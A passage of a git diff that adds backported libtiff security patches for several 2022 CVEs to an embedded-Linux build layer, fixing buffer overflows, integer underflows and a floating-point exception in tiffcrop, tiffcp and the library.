18--- a/libtiff/tif_dirread.c
19+++ b/libtiff/tif_dirread.c
20@@ -5021,7 +5021,10 @@ TIFFFetchNormalTag(TIFF* tif, TIFFDirEntry* dp, int recover)
21 _TIFFfree(data);
22 return(0);
23 }
24- _TIFFmemcpy(o,data,(uint32)dp->tdir_count);
25+ if (dp->tdir_count > 0 )
26+ {
27+ _TIFFmemcpy(o,data,(uint32)dp->tdir_count);
28+ }
29 o[(uint32)dp->tdir_count]=0;
30 if (data!=0)
31 _TIFFfree(data);
32--
33GitLab
34
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2022-0909.patch b/meta/recipes-multimedia/libtiff/files/CVE-2022-0909.patch
new file mode 100644
index 0000000000..d487f1bd95
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2022-0909.patch
@@ -0,0 +1,37 @@
1From 32ea0722ee68f503b7a3f9b2d557acb293fc8cde Mon Sep 17 00:00:00 2001
2From: 4ugustus <wangdw.augustus@qq.com>
3Date: Tue, 8 Mar 2022 16:22:04 +0000
4Subject: [PATCH] fix the FPE in tiffcrop (#393)
5
6CVE: CVE-2022-0909
7Upstream-Status: Backport [https://sources.debian.org/src/tiff/4.1.0+git191117-2%7Edeb10u4/debian/patches/CVE-2022-0909.patch/]
8Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
9Comment: No change in any hunk
10
11---
12 libtiff/tif_dir.c | 4 ++--
13 1 file changed, 2 insertions(+), 2 deletions(-)
14
15diff --git a/libtiff/tif_dir.c b/libtiff/tif_dir.c
16index 57055ca9..59b346ca 100644
17--- a/libtiff/tif_dir.c
18+++ b/libtiff/tif_dir.c
19@@ -334,13 +334,13 @@ _TIFFVSetField(TIFF* tif, uint32_t tag, va_list ap)
20 break;
21 case TIFFTAG_XRESOLUTION:
22 dblval = va_arg(ap, double);
23- if( dblval < 0 )
24+ if( dblval != dblval || dblval < 0 )
25 goto badvaluedouble;
26 td->td_xresolution = _TIFFClampDoubleToFloat( dblval );
27 break;
28 case TIFFTAG_YRESOLUTION:
29 dblval = va_arg(ap, double);
30- if( dblval < 0 )
31+ if( dblval != dblval || dblval < 0 )
32 goto badvaluedouble;
33 td->td_yresolution = _TIFFClampDoubleToFloat( dblval );
34 break;
35--
36GitLab
37
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2022-0924.patch b/meta/recipes-multimedia/libtiff/files/CVE-2022-0924.patch
new file mode 100644
index 0000000000..ddb035c972
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2022-0924.patch
@@ -0,0 +1,58 @@
1From 88d79a45a31c74cba98c697892fed5f7db8b963a Mon Sep 17 00:00:00 2001
2From: 4ugustus <wangdw.augustus@qq.com>
3Date: Thu, 10 Mar 2022 08:48:00 +0000
4Subject: [PATCH] fix heap buffer overflow in tiffcp (#278)
5
6CVE: CVE-2022-0924
7Upstream-Status: Backport [https://sources.debian.org/src/tiff/4.1.0+git191117-2%7Edeb10u4/debian/patches/CVE-2022-0924.patch/]
8Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
9Comment: No change in any hunk
10
11---
12 tools/tiffcp.c | 17 ++++++++++++++++-
13 1 file changed, 16 insertions(+), 1 deletion(-)
14
15diff --git a/tools/tiffcp.c b/tools/tiffcp.c
16index 224583e0..aa32b118 100644
17--- a/tools/tiffcp.c
18+++ b/tools/tiffcp.c
19@@ -1524,12 +1524,27 @@ DECLAREwriteFunc(writeBufferToSeparateSt
20 tdata_t obuf;
21 tstrip_t strip = 0;
22 tsample_t s;
23+ uint16 bps = 0, bytes_per_sample;
24
25 obuf = _TIFFmalloc(stripsize);
26 if (obuf == NULL)
27 return (0);
28 _TIFFmemset(obuf, 0, stripsize);
29 (void) TIFFGetFieldDefaulted(out, TIFFTAG_ROWSPERSTRIP, &rowsperstrip);
30+ (void) TIFFGetField(out, TIFFTAG_BITSPERSAMPLE, &bps);
31+ if( bps == 0 )
32+ {
33+ TIFFError(TIFFFileName(out), "Error, cannot read BitsPerSample");
34+ _TIFFfree(obuf);
35+ return 0;
36+ }
37+ if( (bps % 8) != 0 )
38+ {
39+ TIFFError(TIFFFileName(out), "Error, cannot handle BitsPerSample that is not a multiple of 8");
40+ _TIFFfree(obuf);
41+ return 0;
42+ }
43+ bytes_per_sample = bps/8;
44 for (s = 0; s < spp; s++) {
45 uint32 row;
46 for (row = 0; row < imagelength; row += rowsperstrip) {
47@@ -1539,7 +1539,7 @@ DECLAREwriteFunc(writeBufferToSeparateSt
48
49 cpContigBufToSeparateBuf(
50 obuf, (uint8*) buf + row*rowsize + s,
51- nrows, imagewidth, 0, 0, spp, 1);
52+ nrows, imagewidth, 0, 0, spp, bytes_per_sample);
53 if (TIFFWriteEncodedStrip(out, strip++, obuf, stripsize) < 0) {
54 TIFFError(TIFFFileName(out),
55 "Error, can't write strip %u",
56--
57GitLab
58
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2022-2056-CVE-2022-2057-CVE-2022-2058.patch b/meta/recipes-multimedia/libtiff/files/CVE-2022-2056-CVE-2022-2057-CVE-2022-2058.patch
new file mode 100644
index 0000000000..01e81349a2
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2022-2056-CVE-2022-2057-CVE-2022-2058.patch
@@ -0,0 +1,183 @@
1From 8261237113a53cd21029c4a8cbb62c47b4c19523 Mon Sep 17 00:00:00 2001
2From: Hitendra Prajapati <hprajapati@mvista.com>
3Date: Wed, 27 Jul 2022 11:30:18 +0530
4Subject: [PATCH] CVE-2022-2056 CVE-2022-2057 CVE-2022-2058
5
6Upstream-Status: Backport [https://gitlab.com/libtiff/libtiff/-/commit/dd1bcc7abb26094e93636e85520f0d8f81ab0fab]
7CVE: CVE-2022-2056 CVE-2022-2057 CVE-2022-2058
8Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
9---
10 libtiff/tif_aux.c | 9 +++++++
11 libtiff/tiffiop.h | 1 +
12 tools/tiffcrop.c | 62 ++++++++++++++++++++++++++---------------------
13 3 files changed, 44 insertions(+), 28 deletions(-)
14
15diff --git a/libtiff/tif_aux.c b/libtiff/tif_aux.c
16index 8188db5..3dac542 100644
17--- a/libtiff/tif_aux.c
18+++ b/libtiff/tif_aux.c
19@@ -402,6 +402,15 @@ float _TIFFClampDoubleToFloat( double val )
20 return (float)val;
21 }
22
23+uint32 _TIFFClampDoubleToUInt32(double val)
24+{
25+ if( val < 0 )
26+ return 0;
27+ if( val > 0xFFFFFFFFU || val != val )
28+ return 0xFFFFFFFFU;
29+ return (uint32)val;
30+}
31+
32 int _TIFFSeekOK(TIFF* tif, toff_t off)
33 {
34 /* Huge offsets, especially -1 / UINT64_MAX, can cause issues */
35diff --git a/libtiff/tiffiop.h b/libtiff/tiffiop.h
36index 45a7932..c6f6f93 100644
37--- a/libtiff/tiffiop.h
38+++ b/libtiff/tiffiop.h
39@@ -393,6 +393,7 @@ extern double _TIFFUInt64ToDouble(uint64);
40 extern float _TIFFUInt64ToFloat(uint64);
41
42 extern float _TIFFClampDoubleToFloat(double);
43+extern uint32 _TIFFClampDoubleToUInt32(double);
44
45 extern tmsize_t
46 _TIFFReadEncodedStripAndAllocBuffer(TIFF* tif, uint32 strip,
47diff --git a/tools/tiffcrop.c b/tools/tiffcrop.c
48index c2c2052..79dd0a0 100644
49--- a/tools/tiffcrop.c
50+++ b/tools/tiffcrop.c
51@@ -5141,17 +5141,17 @@ computeInputPixelOffsets(struct crop_mask *crop, struct image_data *image,
52 {
53 if ((crop->res_unit == RESUNIT_INCH) || (crop->res_unit == RESUNIT_CENTIMETER))
54 {
55- x1 = (uint32) (crop->corners[i].X1 * scale * xres);
56- x2 = (uint32) (crop->corners[i].X2 * scale * xres);
57- y1 = (uint32) (crop->corners[i].Y1 * scale * yres);
58- y2 = (uint32) (crop->corners[i].Y2 * scale * yres);
59+ x1 = _TIFFClampDoubleToUInt32(crop->corners[i].X1 * scale * xres);
60+ x2 = _TIFFClampDoubleToUInt32(crop->corners[i].X2 * scale * xres);
61+ y1 = _TIFFClampDoubleToUInt32(crop->corners[i].Y1 * scale * yres);
62+ y2 = _TIFFClampDoubleToUInt32(crop->corners[i].Y2 * scale * yres);
63 }
64 else
65 {
66- x1 = (uint32) (crop->corners[i].X1);
67- x2 = (uint32) (crop->corners[i].X2);
68- y1 = (uint32) (crop->corners[i].Y1);
69- y2 = (uint32) (crop->corners[i].Y2);
70+ x1 = _TIFFClampDoubleToUInt32(crop->corners[i].X1);
71+ x2 = _TIFFClampDoubleToUInt32(crop->corners[i].X2);
72+ y1 = _TIFFClampDoubleToUInt32(crop->corners[i].Y1);
73+ y2 = _TIFFClampDoubleToUInt32(crop->corners[i].Y2);
74 }
75 if (x1 < 1)
76 crop->regionlist[i].x1 = 0;
77@@ -5214,17 +5214,17 @@ computeInputPixelOffsets(struct crop_mask *crop, struct image_data *image,
78 {
79 if (crop->res_unit != RESUNIT_INCH && crop->res_unit != RESUNIT_CENTIMETER)
80 { /* User has specified pixels as reference unit */
81- tmargin = (uint32)(crop->margins[0]);
82- lmargin = (uint32)(crop->margins[1]);
83- bmargin = (uint32)(crop->margins[2]);
84- rmargin = (uint32)(crop->margins[3]);
85+ tmargin = _TIFFClampDoubleToUInt32(crop->margins[0]);
86+ lmargin = _TIFFClampDoubleToUInt32(crop->margins[1]);
87+ bmargin = _TIFFClampDoubleToUInt32(crop->margins[2]);
88+ rmargin = _TIFFClampDoubleToUInt32(crop->margins[3]);
89 }
90 else
91 { /* inches or centimeters specified */
92- tmargin = (uint32)(crop->margins[0] * scale * yres);
93- lmargin = (uint32)(crop->margins[1] * scale * xres);
94- bmargin = (uint32)(crop->margins[2] * scale * yres);
95- rmargin = (uint32)(crop->margins[3] * scale * xres);
96+ tmargin = _TIFFClampDoubleToUInt32(crop->margins[0] * scale * yres);
97+ lmargin = _TIFFClampDoubleToUInt32(crop->margins[1] * scale * xres);
98+ bmargin = _TIFFClampDoubleToUInt32(crop->margins[2] * scale * yres);
99+ rmargin = _TIFFClampDoubleToUInt32(crop->margins[3] * scale * xres);
100 }
101
102 if ((lmargin + rmargin) > image->width)
103@@ -5254,24 +5254,24 @@ computeInputPixelOffsets(struct crop_mask *crop, struct image_data *image,
104 if (crop->res_unit != RESUNIT_INCH && crop->res_unit != RESUNIT_CENTIMETER)
105 {
106 if (crop->crop_mode & CROP_WIDTH)
107- width = (uint32)crop->width;
108+ width = _TIFFClampDoubleToUInt32(crop->width);
109 else
110 width = image->width - lmargin - rmargin;
111
112 if (crop->crop_mode & CROP_LENGTH)
113- length = (uint32)crop->length;
114+ length = _TIFFClampDoubleToUInt32(crop->length);
115 else
116 length = image->length - tmargin - bmargin;
117 }
118 else
119 {
120 if (crop->crop_mode & CROP_WIDTH)
121- width = (uint32)(crop->width * scale * image->xres);
122+ width = _TIFFClampDoubleToUInt32(crop->width * scale * image->xres);
123 else
124 width = image->width - lmargin - rmargin;
125
126 if (crop->crop_mode & CROP_LENGTH)
127- length = (uint32)(crop->length * scale * image->yres);
128+ length = _TIFFClampDoubleToUInt32(crop->length * scale * image->yres);
129 else
130 length = image->length - tmargin - bmargin;
131 }
132@@ -5670,13 +5670,13 @@ computeOutputPixelOffsets (struct crop_mask *crop, struct image_data *image,
133 {
134 if (page->res_unit == RESUNIT_INCH || page->res_unit == RESUNIT_CENTIMETER)
135 { /* inches or centimeters specified */
136- hmargin = (uint32)(page->hmargin * scale * page->hres * ((image->bps + 7)/ 8));
137- vmargin = (uint32)(page->vmargin * scale * page->vres * ((image->bps + 7)/ 8));
138+ hmargin = _TIFFClampDoubleToUInt32(page->hmargin * scale * page->hres * ((image->bps + 7) / 8));
139+ vmargin = _TIFFClampDoubleToUInt32(page->vmargin * scale * page->vres * ((image->bps + 7) / 8));
140 }
141 else
142 { /* Otherwise user has specified pixels as reference unit */
143- hmargin = (uint32)(page->hmargin * scale * ((image->bps + 7)/ 8));
144- vmargin = (uint32)(page->vmargin * scale * ((image->bps + 7)/ 8));
145+ hmargin = _TIFFClampDoubleToUInt32(page->hmargin * scale * ((image->bps + 7) / 8));
146+ vmargin = _TIFFClampDoubleToUInt32(page->vmargin * scale * ((image->bps + 7) / 8));
147 }
148
149 if ((hmargin * 2.0) > (pwidth * page->hres))
150@@ -5714,13 +5714,13 @@ computeOutputPixelOffsets (struct crop_mask *crop, struct image_data *image,
151 {
152 if (page->mode & PAGE_MODE_PAPERSIZE )
153 {
154- owidth = (uint32)((pwidth * page->hres) - (hmargin * 2));
155- olength = (uint32)((plength * page->vres) - (vmargin * 2));
156+ owidth = _TIFFClampDoubleToUInt32((pwidth * page->hres) - (hmargin * 2));
157+ olength = _TIFFClampDoubleToUInt32((plength * page->vres) - (vmargin * 2));
158 }
159 else
160 {
161- owidth = (uint32)(iwidth - (hmargin * 2 * page->hres));
162- olength = (uint32)(ilength - (vmargin * 2 * page->vres));
163+ owidth = _TIFFClampDoubleToUInt32(iwidth - (hmargin * 2 * page->hres));
164+ olength = _TIFFClampDoubleToUInt32(ilength - (vmargin * 2 * page->vres));
165 }
166 }
167
168@@ -5729,6 +5729,12 @@ computeOutputPixelOffsets (struct crop_mask *crop, struct image_data *image,
169 if (olength > ilength)
170 olength = ilength;
171
172+ if (owidth == 0 || olength == 0)
173+ {
174+ TIFFError("computeOutputPixelOffsets", "Integer overflow when calculating the number of pages");
175+ exit(EXIT_FAILURE);
176+ }
177+
178 /* Compute the number of pages required for Portrait or Landscape */
179 switch (page->orient)
180 {
181--
1822.25.1
183
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2022-2867-CVE-2022-2868-CVE-2022-2869.patch b/meta/recipes-multimedia/libtiff/files/CVE-2022-2867-CVE-2022-2868-CVE-2022-2869.patch
new file mode 100644
index 0000000000..131ff94119
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2022-2867-CVE-2022-2868-CVE-2022-2869.patch
@@ -0,0 +1,159 @@
1From 07d79fcac2ead271b60e32aeb80f7b4f3be9ac8c Mon Sep 17 00:00:00 2001
2From: Su Laus <sulau@freenet.de>
3Date: Wed, 9 Feb 2022 21:31:29 +0000
4Subject: [PATCH] tiffcrop.c: Fix issue #352 heap-buffer-overflow by correcting
5 uint32_t underflow.
6
7CVE: CVE-2022-2867 CVE-2022-2868 CVE-2022-2869
8Upstream-Status: Backport [https://gitlab.com/libtiff/libtiff/-/commit/07d79fcac2ead271b60e32aeb80f7b4f3be9ac8c]
9Signed-off-by: Virendra Thakur <virendrak@kpit.com>
10---
11Index: tiff-4.1.0/tools/tiffcrop.c
12===================================================================
13--- tiff-4.1.0.orig/tools/tiffcrop.c
14+++ tiff-4.1.0/tools/tiffcrop.c
15@@ -5153,29 +5153,45 @@ computeInputPixelOffsets(struct crop_mas
16 y1 = _TIFFClampDoubleToUInt32(crop->corners[i].Y1);
17 y2 = _TIFFClampDoubleToUInt32(crop->corners[i].Y2);
18 }
19- if (x1 < 1)
20- crop->regionlist[i].x1 = 0;
21- else
22- crop->regionlist[i].x1 = (uint32) (x1 - 1);
23+ /* a) Region needs to be within image sizes 0.. width-1; 0..length-1
24+ * b) Corners are expected to be submitted as top-left to bottom-right.
25+ * Therefore, check that and reorder input.
26+ * (be aware x,y are already casted to (uint32_t) and avoid (0 - 1) )
27+ */
28+ uint32_t aux;
29+ if (x1 > x2) {
30+ aux = x1;
31+ x1 = x2;
32+ x2 = aux;
33+ }
34+ if (y1 > y2) {
35+ aux = y1;
36+ y1 = y2;
37+ y2 = aux;
38+ }
39+ if (x1 > image->width - 1)
40+ crop->regionlist[i].x1 = image->width - 1;
41+ else if (x1 > 0)
42+ crop->regionlist[i].x1 = (uint32_t)(x1 - 1);
43
44 if (x2 > image->width - 1)
45 crop->regionlist[i].x2 = image->width - 1;
46- else
47- crop->regionlist[i].x2 = (uint32) (x2 - 1);
48- zwidth = crop->regionlist[i].x2 - crop->regionlist[i].x1 + 1;
49-
50- if (y1 < 1)
51- crop->regionlist[i].y1 = 0;
52- else
53- crop->regionlist[i].y1 = (uint32) (y1 - 1);
54+ else if (x2 > 0)
55+ crop->regionlist[i].x2 = (uint32_t)(x2 - 1);
56+
57+ zwidth = crop->regionlist[i].x2 - crop->regionlist[i].x1 + 1;
58+
59+ if (y1 > image->length - 1)
60+ crop->regionlist[i].y1 = image->length - 1;
61+ else if (y1 > 0)
62+ crop->regionlist[i].y1 = (uint32_t)(y1 - 1);
63
64 if (y2 > image->length - 1)
65 crop->regionlist[i].y2 = image->length - 1;
66- else
67- crop->regionlist[i].y2 = (uint32) (y2 - 1);
68-
69- zlength = crop->regionlist[i].y2 - crop->regionlist[i].y1 + 1;
70+ else if (y2 > 0)
71+ crop->regionlist[i].y2 = (uint32_t)(y2 - 1);
72
73+ zlength = crop->regionlist[i].y2 - crop->regionlist[i].y1 + 1;
74 if (zwidth > max_width)
75 max_width = zwidth;
76 if (zlength > max_length)
77@@ -5205,7 +5221,7 @@ computeInputPixelOffsets(struct crop_mas
78 }
79 }
80 return (0);
81- }
82+ } /* crop_mode == CROP_REGIONS */
83
84 /* Convert crop margins into offsets into image
85 * Margins are expressed as pixel rows and columns, not bytes
86@@ -5241,7 +5257,7 @@ computeInputPixelOffsets(struct crop_mas
87 bmargin = (uint32) 0;
88 return (-1);
89 }
90- }
91+ } /* crop_mode == CROP_MARGINS */
92 else
93 { /* no margins requested */
94 tmargin = (uint32) 0;
95@@ -5332,24 +5348,23 @@ computeInputPixelOffsets(struct crop_mas
96 off->endx = endx;
97 off->endy = endy;
98
99- crop_width = endx - startx + 1;
100- crop_length = endy - starty + 1;
101-
102- if (crop_width <= 0)
103+ if (endx + 1 <= startx)
104 {
105 TIFFError("computeInputPixelOffsets",
106 "Invalid left/right margins and /or image crop width requested");
107 return (-1);
108 }
109+ crop_width = endx - startx + 1;
110 if (crop_width > image->width)
111 crop_width = image->width;
112
113- if (crop_length <= 0)
114+ if (endy + 1 <= starty)
115 {
116 TIFFError("computeInputPixelOffsets",
117 "Invalid top/bottom margins and /or image crop length requested");
118 return (-1);
119 }
120+ crop_length = endy - starty + 1;
121 if (crop_length > image->length)
122 crop_length = image->length;
123
124@@ -5449,10 +5464,17 @@ getCropOffsets(struct image_data *image,
125 else
126 crop->selections = crop->zones;
127
128- for (i = 0; i < crop->zones; i++)
129+ /* Initialize regions iterator i */
130+ i = 0;
131+ for (int j = 0; j < crop->zones; j++)
132 {
133- seg = crop->zonelist[i].position;
134- total = crop->zonelist[i].total;
135+ seg = crop->zonelist[j].position;
136+ total = crop->zonelist[j].total;
137+
138+ /* check for not allowed zone cases like 0:0; 4:3; etc. and skip that input */
139+ if (seg == 0 || total == 0 || seg > total) {
140+ continue;
141+ }
142
143 switch (crop->edge_ref)
144 {
145@@ -5581,8 +5603,11 @@ getCropOffsets(struct image_data *image,
146 i + 1, (uint32)zwidth, (uint32)zlength,
147 crop->regionlist[i].x1, crop->regionlist[i].x2,
148 crop->regionlist[i].y1, crop->regionlist[i].y2);
149+ /* increment regions iterator */
150+ i++;
151 }
152-
153+ /* set number of generated regions out of given zones */
154+ crop->selections = i;
155 return (0);
156 } /* end getCropOffsets */
157
158--
159GitLab
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2022-34526.patch b/meta/recipes-multimedia/libtiff/files/CVE-2022-34526.patch
new file mode 100644
index 0000000000..cf440ce55f
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2022-34526.patch
@@ -0,0 +1,29 @@
1From 06386cc9dff5dc162006abe11fd4d1a6fad616cc Mon Sep 17 00:00:00 2001
2From: Hitendra Prajapati <hprajapati@mvista.com>
3Date: Thu, 18 Aug 2022 09:40:50 +0530
4Subject: [PATCH] CVE-2022-34526
5
6Upstream-Status: Backport [https://gitlab.com/libtiff/libtiff/-/commit/275735d0354e39c0ac1dc3c0db2120d6f31d1990]
7CVE: CVE-2022-34526
8Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
9---
10 libtiff/tif_dirinfo.c | 3 +++
11 1 file changed, 3 insertions(+)
12
13diff --git a/libtiff/tif_dirinfo.c b/libtiff/tif_dirinfo.c
14index 52d53d4..4a1ca00 100644
15--- a/libtiff/tif_dirinfo.c
16+++ b/libtiff/tif_dirinfo.c
17@@ -983,6 +983,9 @@ _TIFFCheckFieldIsValidForCodec(TIFF *tif, ttag_t tag)
18 default:
19 return 1;
20 }
21+ if( !TIFFIsCODECConfigured(tif->tif_dir.td_compression) ) {
22+ return 0;
23+ }
24 /* Check if codec specific tags are allowed for the current
25 * compression scheme (codec) */
26 switch (tif->tif_dir.td_compression) {
27--
282.25.1
29
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2022-3570_3598.patch b/meta/recipes-multimedia/libtiff/files/CVE-2022-3570_3598.patch
new file mode 100644
index 0000000000..760e20dd2b
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2022-3570_3598.patch
@@ -0,0 +1,659 @@
1From 226e336cdceec933da2e9f72b6578c7a1bea450b Mon Sep 17 00:00:00 2001
2From: Su Laus <sulau@freenet.de>
3Date: Thu, 13 Oct 2022 14:33:27 +0000
4Subject: [PATCH] tiffcrop subroutines require a larger buffer (fixes #271,
5
6Upstream-Status: Backport [import from debian http://security.debian.org/debian-security/pool/updates/main/t/tiff/tiff_4.1.0+git191117-2~deb10u7.debian.tar.xz ]
7CVE: CVE-2022-3570 CVE-2022-3598
8Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
9
10Origin: https://gitlab.com/libtiff/libtiff/-/commit/cfbb883bf6ea7bedcb04177cc4e52d304522fdff
11Origin: https://gitlab.com/libtiff/libtiff/-/commit/24d3b2425af24432e0e4e2fd58b33f3b04c4bfa4
12Reviewed-by: Sylvain Beucler <beuc@debian.org>
13Last-Update: 2023-01-17
14
15 #381, #386, #388, #389, #435)
16
17---
18 tools/tiffcrop.c | 209 ++++++++++++++++++++++++++---------------------
19 1 file changed, 117 insertions(+), 92 deletions(-)
20
21diff --git a/tools/tiffcrop.c b/tools/tiffcrop.c
22index c7877aa..c923920 100644
23--- a/tools/tiffcrop.c
24+++ b/tools/tiffcrop.c
25@@ -126,6 +126,7 @@ static char tiffcrop_rev_date[] = "03-03-2010";
26
27 #ifdef HAVE_STDINT_H
28 # include <stdint.h>
29+# include <inttypes.h>
30 #endif
31
32 #ifndef HAVE_GETOPT
33@@ -212,6 +213,10 @@ extern int getopt(int argc, char * const argv[], const char *optstring);
34
35 #define TIFF_DIR_MAX 65534
36
37+/* Some conversion subroutines require image buffers, which are at least 3 bytes
38+ * larger than the necessary size for the image itself. */
39+#define NUM_BUFF_OVERSIZE_BYTES 3
40+
41 /* Offsets into buffer for margins and fixed width and length segments */
42 struct offset {
43 uint32 tmargin;
44@@ -233,7 +238,7 @@ struct offset {
45 */
46
47 struct buffinfo {
48- uint32 size; /* size of this buffer */
49+ size_t size; /* size of this buffer */
50 unsigned char *buffer; /* address of the allocated buffer */
51 };
52
53@@ -771,8 +776,8 @@ static int readContigTilesIntoBuffer (TIFF* in, uint8* buf,
54 uint32 dst_rowsize, shift_width;
55 uint32 bytes_per_sample, bytes_per_pixel;
56 uint32 trailing_bits, prev_trailing_bits;
57- uint32 tile_rowsize = TIFFTileRowSize(in);
58- uint32 src_offset, dst_offset;
59+ tmsize_t tile_rowsize = TIFFTileRowSize(in);
60+ tmsize_t src_offset, dst_offset;
61 uint32 row_offset, col_offset;
62 uint8 *bufp = (uint8*) buf;
63 unsigned char *src = NULL;
64@@ -822,7 +827,7 @@ static int readContigTilesIntoBuffer (TIFF* in, uint8* buf,
65 TIFFError("readContigTilesIntoBuffer", "Integer overflow when calculating buffer size.");
66 exit(-1);
67 }
68- tilebuf = _TIFFmalloc(tile_buffsize + 3);
69+ tilebuf = _TIFFmalloc(tile_buffsize + NUM_BUFF_OVERSIZE_BYTES);
70 if (tilebuf == 0)
71 return 0;
72 tilebuf[tile_buffsize] = 0;
73@@ -986,7 +991,7 @@ static int readSeparateTilesIntoBuffer (TIFF* in, uint8 *obuf,
74 for (sample = 0; (sample < spp) && (sample < MAX_SAMPLES); sample++)
75 {
76 srcbuffs[sample] = NULL;
77- tbuff = (unsigned char *)_TIFFmalloc(tilesize + 8);
78+ tbuff = (unsigned char *)_TIFFmalloc(tilesize + NUM_BUFF_OVERSIZE_BYTES);
79 if (!tbuff)
80 {
81 TIFFError ("readSeparateTilesIntoBuffer",
82@@ -1181,7 +1186,8 @@ writeBufferToSeparateStrips (TIFF* out, uint8* buf,
83 }
84 rowstripsize = rowsperstrip * bytes_per_sample * (width + 1);
85
86- obuf = _TIFFmalloc (rowstripsize);
87+ /* Add 3 padding bytes for extractContigSamples32bits */
88+ obuf = _TIFFmalloc (rowstripsize + NUM_BUFF_OVERSIZE_BYTES);
89 if (obuf == NULL)
90 return 1;
91
92@@ -1194,7 +1200,7 @@ writeBufferToSeparateStrips (TIFF* out, uint8* buf,
93 stripsize = TIFFVStripSize(out, nrows);
94 src = buf + (row * rowsize);
95 total_bytes += stripsize;
96- memset (obuf, '\0', rowstripsize);
97+ memset (obuf, '\0',rowstripsize + NUM_BUFF_OVERSIZE_BYTES);
98 if (extractContigSamplesToBuffer(obuf, src, nrows, width, s, spp, bps, dump))
99 {
100 _TIFFfree(obuf);
101@@ -1202,10 +1208,15 @@ writeBufferToSeparateStrips (TIFF* out, uint8* buf,
102 }
103 if ((dump->outfile != NULL) && (dump->level == 1))
104 {
105- dump_info(dump->outfile, dump->format,"",
106+ if ((uint64_t)scanlinesize > 0x0ffffffffULL) {
107+ dump_info(dump->infile, dump->format, "loadImage",
108+ "Attention: scanlinesize %"PRIu64" is larger than UINT32_MAX.\nFollowing dump might be wrong.",
109+ (uint64_t)scanlinesize);
110+ }
111+ dump_info(dump->outfile, dump->format,"",
112 "Sample %2d, Strip: %2d, bytes: %4d, Row %4d, bytes: %4d, Input offset: %6d",
113- s + 1, strip + 1, stripsize, row + 1, scanlinesize, src - buf);
114- dump_buffer(dump->outfile, dump->format, nrows, scanlinesize, row, obuf);
115+ s + 1, strip + 1, stripsize, row + 1, (uint32)scanlinesize, src - buf);
116+ dump_buffer(dump->outfile, dump->format, nrows, (uint32)scanlinesize, row, obuf);
117 }
118
119 if (TIFFWriteEncodedStrip(out, strip++, obuf, stripsize) < 0)
120@@ -1232,7 +1243,7 @@ static int writeBufferToContigTiles (TIFF* out, uint8* buf, uint32 imagelength,
121 uint32 tl, tw;
122 uint32 row, col, nrow, ncol;
123 uint32 src_rowsize, col_offset;
124- uint32 tile_rowsize = TIFFTileRowSize(out);
125+ tmsize_t tile_rowsize = TIFFTileRowSize(out);
126 uint8* bufp = (uint8*) buf;
127 tsize_t tile_buffsize = 0;
128 tsize_t tilesize = TIFFTileSize(out);
129@@ -1275,9 +1286,11 @@ static int writeBufferToContigTiles (TIFF* out, uint8* buf, uint32 imagelength,
130 }
131 src_rowsize = ((imagewidth * spp * bps) + 7U) / 8;
132
133- tilebuf = _TIFFmalloc(tile_buffsize);
134+ /* Add 3 padding bytes for extractContigSamples32bits */
135+ tilebuf = _TIFFmalloc(tile_buffsize + NUM_BUFF_OVERSIZE_BYTES);
136 if (tilebuf == 0)
137 return 1;
138+ memset(tilebuf, 0, tile_buffsize + NUM_BUFF_OVERSIZE_BYTES);
139 for (row = 0; row < imagelength; row += tl)
140 {
141 nrow = (row + tl > imagelength) ? imagelength - row : tl;
142@@ -1323,7 +1336,8 @@ static int writeBufferToSeparateTiles (TIFF* out, uint8* buf, uint32 imagelength
143 uint32 imagewidth, tsample_t spp,
144 struct dump_opts * dump)
145 {
146- tdata_t obuf = _TIFFmalloc(TIFFTileSize(out));
147+ /* Add 3 padding bytes for extractContigSamples32bits */
148+ tdata_t obuf = _TIFFmalloc(TIFFTileSize(out) + NUM_BUFF_OVERSIZE_BYTES);
149 uint32 tl, tw;
150 uint32 row, col, nrow, ncol;
151 uint32 src_rowsize, col_offset;
152@@ -1333,6 +1347,7 @@ static int writeBufferToSeparateTiles (TIFF* out, uint8* buf, uint32 imagelength
153
154 if (obuf == NULL)
155 return 1;
156+ memset(obuf, 0, TIFFTileSize(out) + NUM_BUFF_OVERSIZE_BYTES);
157
158 TIFFGetField(out, TIFFTAG_TILELENGTH, &tl);
159 TIFFGetField(out, TIFFTAG_TILEWIDTH, &tw);
160@@ -1754,14 +1769,14 @@ void process_command_opts (int argc, char *argv[], char *mp, char *mode, uint32
161
162 *opt_offset = '\0';
163 /* convert option to lowercase */
164- end = strlen (opt_ptr);
165+ end = (unsigned int)strlen (opt_ptr);
166 for (i = 0; i < end; i++)
167 *(opt_ptr + i) = tolower((int) *(opt_ptr + i));
168 /* Look for dump format specification */
169 if (strncmp(opt_ptr, "for", 3) == 0)
170 {
171 /* convert value to lowercase */
172- end = strlen (opt_offset + 1);
173+ end = (unsigned int)strlen (opt_offset + 1);
174 for (i = 1; i <= end; i++)
175 *(opt_offset + i) = tolower((int) *(opt_offset + i));
176 /* check dump format value */
177@@ -2213,6 +2228,8 @@ main(int argc, char* argv[])
178 size_t length;
179 char temp_filename[PATH_MAX + 16]; /* Extra space keeps the compiler from complaining */
180
181+ assert(NUM_BUFF_OVERSIZE_BYTES >= 3);
182+
183 little_endian = *((unsigned char *)&little_endian) & '1';
184
185 initImageData(&image);
186@@ -3114,13 +3131,13 @@ extractContigSamples32bits (uint8 *in, uint8 *out, uint32 cols,
187 /* If we have a full buffer's worth, write it out */
188 if (ready_bits >= 32)
189 {
190- bytebuff1 = (buff2 >> 56);
191+ bytebuff1 = (uint8)(buff2 >> 56);
192 *dst++ = bytebuff1;
193- bytebuff2 = (buff2 >> 48);
